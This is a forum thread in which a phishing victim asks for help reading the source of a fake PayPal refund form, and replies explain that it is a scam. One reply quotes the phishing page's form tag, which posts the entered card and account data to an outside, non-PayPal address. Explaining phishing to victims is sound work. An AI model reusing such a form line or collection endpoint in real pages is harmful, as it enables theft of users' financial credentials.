Could REALLY use some help with this

Alright I got home late and wanted to go through my emails before going to bed. In my email I saw something from "paypal" saying that they need to verify my account for a refund (I was just notified I was getting a refund two days ago because an ebay seller didn't have what I ordered) so I figured hey I was told I was getting a refund this must just be something you get with your first refund. Well needless to say I didn't think to double check any information because of how late it was and the fact that I already knew a refund was in the works. I know it is stupid and surprisingly I am rather computer literate but I just had a MAJOR laps in judgment. Anyway I filled out the info and hit the submit button and it took me to a 403 forbidden page and thats when it hit me that I feel for a scam. I only know the most simple basics of html so I can't really understand all of what I am looking at but what I would love help with is if anyone can look at the source code and tell me if it was sent to anyone that actually would have the information or if it was a scam that was shut down before reaching me. (don't worry already canceled my card and am going to add fraud alert to my credit in the morning this is more for piece of mind) The original thing I got was a form I had to download from email and fill out (yes I realize that right there should have told me scam as I said MAJOR laps in judgment) and then after I filled that out it took me to the 403 forbidden page. I am computer literate but not programing literate (I know what phishing is but I don't know how it works) so I don't know if I am asking a stupid question on here or not but I literaly had no place else to go so I would really apreiciate help with this. And as little mocking as possible seeing as how I already realize how stupid what I did was and how potential screwed I could be.

OK well I don't see them sending anything to a email address that seems weird but I could have missed it, since there is alot of code there and some of the code uses classes(basically means its in another file, not in this code), but I would definitely contact PayPal and see if it was really them and or check the email address from which you received the email and see if PayPal has any email address with the same name, if any thing seems weird delete your account or what ever you can do.

Um Sorry Mate But It Looks As If This Is In Fact A Scam Because With The Paypal Page Elements It is All Pointing To The Proper Paypal Server But Some Elements, Being Forms Are Pointing to An Unnoficial Website. Someone Has Made a Phishing Page And Edited The Html Not To point To The Paypal Secure PHP Processor For The Form but it Is Pointing to some non-legitimate website, U Can See this In this particular line of code <FORM METHOD="POST" ACTION="http://iarabeau.ro/cc/" style="background-color: #EEEEEE">
Notice next to Where It Says Action That the url Has Nothing to do with paypal it says some suss name... So Unfortunately U Have Been Scammed Mate ... If U Would Like Anymore Information On Phishing I Would Be Happy To Help You, So Just Ask. :)
